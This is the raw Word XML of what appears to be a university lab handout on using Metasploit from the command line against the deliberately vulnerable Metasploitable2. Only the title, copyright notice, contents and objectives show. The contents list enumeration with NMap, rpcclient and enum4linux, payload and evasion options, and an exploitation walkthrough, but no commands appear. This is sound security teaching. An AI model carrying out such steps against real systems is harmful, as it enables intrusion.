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Title"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Hands-on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="50"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Lab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="51"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Description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3230079</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>212078</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1236345" cy="11125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107002pt;margin-top:12.315622pt;width:478.2pt;height:32.35pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15728128;mso-wrap-distance-left:0;mso-wrap-distance-right:0" type="#_x0000_t202" filled="false" stroked="true" strokeweight=".398pt" strokecolor="#000000">
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="249" w:lineRule="auto" w:before="23"/>
                    <w:ind w:left="5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2020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Copyright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Notice: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lab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materials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are</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:spacing w:val="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only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used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for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education</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:spacing w:val="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purpose.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Copy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redistribution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is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prohibited</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:spacing w:val="2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or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need</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:spacing w:val="2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spacing w:val="-3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get</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:spacing w:val="1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authors’</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:spacing w:val="1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consent.</w:t>
                  </w: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105"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>Please</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:spacing w:val="-5"/>
                      <w:w w:val="105"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:spacing w:val="-1"/>
                      <w:w w:val="105"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>contact</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr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spacing w:val="-1"/>
                      <w:w w:val="105"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>Professor</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr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spacing w:val="-1"/>
                      <w:w w:val="105"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>Dijiang</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr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Huang:</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:spacing w:val="-4"/>
                      <w:w w:val="105"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:hyperlink r:id="rId7">
                    <w:r>
                      <w:rPr>
                        <w:w w:val="105"/>
                        <w:sz w:val="16"/>
                      </w:rPr>
                      <w:t>Dijiang.Huang@asu.edu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5"/>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="103" w:top="620" w:bottom="280" w:left="1100" w:right="1060"/>
          <w:pgNumType w:start="1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0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="79" w:lineRule="exact"/>
        <w:ind w:left="180"/>
        <w:rPr>
          <w:sz w:val="7"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:position w:val="-1"/>
          <w:sz w:val="7"/>
        </w:rPr>
        <w:pict>
          <v:group style="width:475.2pt;height:4pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordorigin="0,0" coordsize="9504,80">
            <v:rect style="position:absolute;left:0;top:0;width:1674;height:80" filled="true" fillcolor="#000000" stroked="false">
              <v:fill type="solid"/>
            </v:rect>
            <v:line style="position:absolute" from="0,5" to="9504,5" stroked="true" strokeweight=".498pt" strokecolor="#000000">
              <v:stroke dashstyle="solid"/>
            </v:line>
          </v:group>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:position w:val="-1"/>
          <w:sz w:val="7"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="406" w:lineRule="exact" w:before="113"/>
        <w:ind w:left="185" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left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w w:val="95"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>CS-CNS-20010</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:spacing w:val="26"/>
          <w:w w:val="95"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:w w:val="95"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="406" w:lineRule="exact" w:before="0"/>
        <w:ind w:left="185" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:i/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:shape style="position:absolute;margin-left:64.255997pt;margin-top:25.135073pt;width:83.7pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15727104;mso-wrap-distance-left:0;mso-wrap-distance-right:0" coordorigin="1285,503" coordsize="1674,0" path="m1285,503l2959,503e" filled="false" stroked="true" strokeweight=".498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i/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Network</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:i/>
          <w:spacing w:val="2"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:i/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:i/>
          <w:spacing w:val="2"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:i/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:i/>
          <w:spacing w:val="2"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:i/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Tool:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:i/>
          <w:spacing w:val="2"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:i/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:i/>
          <w:spacing w:val="2"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:i/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>(CLI)</w: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2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="148"/>
        <w:ind w:left="185" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="10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02" w:val="left" w:leader="none"/>
              <w:tab w:pos="6909" w:val="right" w:leader="none"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Georgia"/>
              <w:b w:val="0"/>
              <w:i w:val="0"/>
              <w:sz w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250007">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Georgia"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>1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Background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of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Metasploit</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Georgia"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:spacing w:val="46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4</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:pos="1500" w:val="left" w:leader="none"/>
              <w:tab w:pos="6909" w:val="right" w:leader="none"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Georgia"/>
              <w:b w:val="0"/>
              <w:i w:val="0"/>
              <w:sz w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250006">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Georgia"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>1.1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Basic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Msfconsole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Commands</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Georgia"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:spacing w:val="74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416" w:val="left" w:leader="none"/>
              <w:tab w:pos="2417" w:val="left" w:leader="none"/>
              <w:tab w:pos="6909" w:val="right" w:leader="none"/>
            </w:tabs>
            <w:spacing w:line="240" w:lineRule="auto" w:before="8" w:after="0"/>
            <w:ind w:left="2416" w:right="0" w:hanging="917"/>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:rFonts w:ascii="Georgia"/>
              <w:b w:val="0"/>
              <w:i w:val="0"/>
              <w:sz w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250005">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Georgia"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:w w:val="95"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Setup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and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Run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Metasploit</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Georgia"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:spacing w:val="106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416" w:val="left" w:leader="none"/>
              <w:tab w:pos="2417" w:val="left" w:leader="none"/>
              <w:tab w:pos="6909" w:val="right" w:leader="none"/>
            </w:tabs>
            <w:spacing w:line="240" w:lineRule="auto" w:before="7" w:after="0"/>
            <w:ind w:left="2416" w:right="0" w:hanging="917"/>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:rFonts w:ascii="Georgia"/>
              <w:b w:val="0"/>
              <w:i w:val="0"/>
              <w:sz w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250004">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Georgia"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:w w:val="95"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Use,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back,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and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exit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commands</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Georgia"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:spacing w:val="77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5</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:pos="2416" w:val="left" w:leader="none"/>
              <w:tab w:pos="6909" w:val="right" w:leader="none"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Georgia"/>
              <w:b w:val="0"/>
              <w:i w:val="0"/>
              <w:sz w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250003">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Georgia"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>1.1.3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Help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</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Georgia"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:spacing w:val="59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5</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:pos="2416" w:val="left" w:leader="none"/>
              <w:tab w:pos="6909" w:val="right" w:leader="none"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Georgia"/>
              <w:b w:val="0"/>
              <w:i w:val="0"/>
              <w:sz w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250002">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Georgia"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>1.1.4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Info</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Georgia"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:spacing w:val="24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</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Georgia"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:spacing w:val="123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5</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:pos="2416" w:val="left" w:leader="none"/>
              <w:tab w:pos="6909" w:val="right" w:leader="none"/>
            </w:tabs>
            <w:spacing w:before="7"/>
            <w:rPr>
              <w:rFonts w:ascii="Georgia"/>
              <w:b w:val="0"/>
              <w:i w:val="0"/>
              <w:sz w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250001">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Georgia"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>1.1.5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Search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</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Georgia"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:spacing w:val="56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5</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:pos="1500" w:val="left" w:leader="none"/>
              <w:tab w:pos="6909" w:val="right" w:leader="none"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Georgia"/>
              <w:b w:val="0"/>
              <w:i w:val="0"/>
              <w:sz w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr/>
            <w:pict>
              <v:shape style="position:absolute;margin-left:61.756001pt;margin-top:10.507034pt;width:341.25pt;height:229.35pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:15730688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99"/>
                        <w:gridCol w:w="6030"/>
                        <w:gridCol w:w="396"/>
                      </w:tblGrid>
                      <w:tr>
                        <w:trPr>
                          <w:trHeight w:val="260" w:hRule="atLeast"/>
                        </w:trPr>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="642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2281" w:val="left" w:leader="none"/>
                              </w:tabs>
                              <w:spacing w:line="204" w:lineRule="exact" w:before="37"/>
                              <w:ind w:left="1365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1.2.1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Georgia"/>
                                <w:spacing w:val="6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8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642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2281" w:val="left" w:leader="none"/>
                              </w:tabs>
                              <w:spacing w:line="204" w:lineRule="exact" w:before="15"/>
                              <w:ind w:left="1365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1.2.2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payloads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8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642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2281" w:val="left" w:leader="none"/>
                              </w:tabs>
                              <w:spacing w:line="204" w:lineRule="exact" w:before="15"/>
                              <w:ind w:left="1365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1.2.3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Targets</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Georgia"/>
                                <w:spacing w:val="4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9"/>
                                <w:sz w:val="20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642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2281" w:val="left" w:leader="none"/>
                              </w:tabs>
                              <w:spacing w:line="182" w:lineRule="exact" w:before="15"/>
                              <w:ind w:left="1365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1.2.4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advanced</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Georgia"/>
                                <w:spacing w:val="5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spacing w:line="178" w:lineRule="exact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60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916" w:val="left" w:leader="none"/>
                              </w:tabs>
                              <w:spacing w:line="204" w:lineRule="exact" w:before="37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1.2.5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Nops</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Georgia"/>
                                <w:spacing w:val="10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916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1.2.6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evasion</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Georgia"/>
                                <w:spacing w:val="6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1.3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Metasploit</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Georgia"/>
                                <w:spacing w:val="30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Commands</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Georgia"/>
                                <w:spacing w:val="30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Georgia"/>
                                <w:spacing w:val="31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Exploit</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Georgia"/>
                                <w:spacing w:val="30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Execution</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Georgia"/>
                                <w:spacing w:val="3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2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2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2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ind w:left="50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9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Metasploitable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Georgia"/>
                                <w:spacing w:val="8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8"/>
                                <w:sz w:val="2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2.1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Running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Services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Ports</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Georgia"/>
                                <w:spacing w:val="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956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pos="965" w:val="left" w:leader="none"/>
                                <w:tab w:pos="967" w:val="left" w:leader="none"/>
                              </w:tabs>
                              <w:spacing w:line="240" w:lineRule="auto" w:before="15" w:after="0"/>
                              <w:ind w:left="966" w:right="0" w:hanging="719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Metasploitable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enumeration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2"/>
                                <w:numId w:val="2"/>
                              </w:numPr>
                              <w:tabs>
                                <w:tab w:pos="1882" w:val="left" w:leader="none"/>
                                <w:tab w:pos="1883" w:val="left" w:leader="none"/>
                              </w:tabs>
                              <w:spacing w:line="240" w:lineRule="auto" w:before="8" w:after="0"/>
                              <w:ind w:left="1882" w:right="0" w:hanging="917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Enumerating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users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NMap</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Georgia"/>
                                <w:spacing w:val="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spacing w:line="204" w:lineRule="exact" w:before="246"/>
                              <w:ind w:left="1882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sessions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rpcclient</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Georgia"/>
                                <w:spacing w:val="3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12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2"/>
                              <w:ind w:left="146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12</w:t>
                            </w:r>
                          </w:p>
                          <w:p>
                            <w:pPr>
                              <w:pStyle w:val="TableParagraph"/>
                              <w:spacing w:before="251"/>
                              <w:ind w:left="146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2.3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Enumeration</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Georgia"/>
                                <w:spacing w:val="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Georgia"/>
                                <w:spacing w:val="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enum4linux</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Georgia"/>
                                <w:spacing w:val="6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13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ind w:left="50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Metasploit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Usecase</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Georgia"/>
                                <w:spacing w:val="5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14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3.1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Step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1:</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Georgia"/>
                                <w:spacing w:val="28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Vulnerability</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Georgia"/>
                                <w:spacing w:val="28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Scanning</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Georgia"/>
                                <w:spacing w:val="5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14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3.2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Step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2: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Preparation</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Georgia"/>
                                <w:spacing w:val="22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tabs>
                                <w:tab w:pos="717" w:val="left" w:leader="none"/>
                              </w:tabs>
                              <w:spacing w:line="204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3.3</w:t>
                              <w:tab/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Step</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Georgia"/>
                                <w:spacing w:val="26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3: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Exploiting</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Georgia"/>
                                <w:spacing w:val="7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260" w:hRule="atLeast"/>
                        </w:trPr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50"/>
                              <w:jc w:val="left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88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0" w:type="dxa"/>
                          </w:tcPr>
                          <w:p>
                            <w:pPr>
                              <w:pStyle w:val="TableParagraph"/>
                              <w:spacing w:line="225" w:lineRule="exact" w:before="15"/>
                              <w:ind w:right="1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Related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Georgia"/>
                                <w:spacing w:val="27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w w:val="95"/>
                                <w:sz w:val="20"/>
                              </w:rPr>
                              <w:t>Resource</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Georgia"/>
                                <w:spacing w:val="1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3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4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right="48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t>16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w:r>
          <w:hyperlink w:history="true" w:anchor="_TOC_250000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Georgia"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>1.2</w:t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Metasploit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Commands</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Georgia"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:spacing w:val="25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for</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Georgia"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:spacing w:val="26"/>
                <w:w w:val="95"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t> </w:t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Exploits</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Georgia"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:spacing w:val="110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4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5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b w:val="0"/>
                <w:spacing w:val="-26"/>
                <w:w w:val="95"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:w w:val="95"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
                <w:b w:val="0"/>
                <w:w w:val="95"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Georgia"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:w w:val="95"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
      </w:sdtContent>
    </w:sdt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tabs>
          <w:tab w:pos="2416" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="1500"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>2.2.2</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Enumerating</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4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accounts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>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>null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4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:right="388"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="115"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="103" w:footer="0" w:top="620" w:bottom="0" w:left="1100" w:right="106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143"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Category:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:pos="681" w:val="left" w:leader="none"/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Times New Roman"/>
          <w:w w:val="99"/>
          <w:shd w:fill="E5E5E5" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:shd w:fill="E5E5E5" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
          <w:w w:val="105"/>
          <w:shd w:fill="E5E5E5" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>CS-CNS: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Computer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Network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Security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1"/>
        <w:rPr>
          <w:rFonts w:ascii="SimSun"/>
          <w:sz w:val="31"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Objectives: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141"/>
        <w:ind w:left="100"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:shape style="position:absolute;margin-left:74.980003pt;margin-top:7.851907pt;width:453.8pt;height:23.95pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:1573632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Understand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network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penetration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testing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tool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Metasploit</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:line="248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Metasploit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exploit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vulnerabilities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Metasploitable2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15"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="12"/>
        <w:ind w:left="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="89"/>
        </w:rPr>
        <w:t>2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Heading3"/>
        <w:spacing w:before="143"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Estimated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="33"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Lab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="34"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Duration: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before="141"/>
        <w:ind w:left="100"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:shape style="position:absolute;margin-left:74.980003pt;margin-top:7.850932pt;width:453.8pt;height:23.95pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:15735808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Expert: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30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minutes</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:line="248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Novice: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90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minutes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15"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="12"/>
        <w:ind w:left="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="89"/>
        </w:rPr>
        <w:t>2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8"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="253" w:footer="0" w:top="1840" w:bottom="280" w:left="1100" w:right="1060"/>
          <w:pgNumType w:start="2"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Difficulty</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="23"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Diagram: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16"/>
        <w:ind w:left="931"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
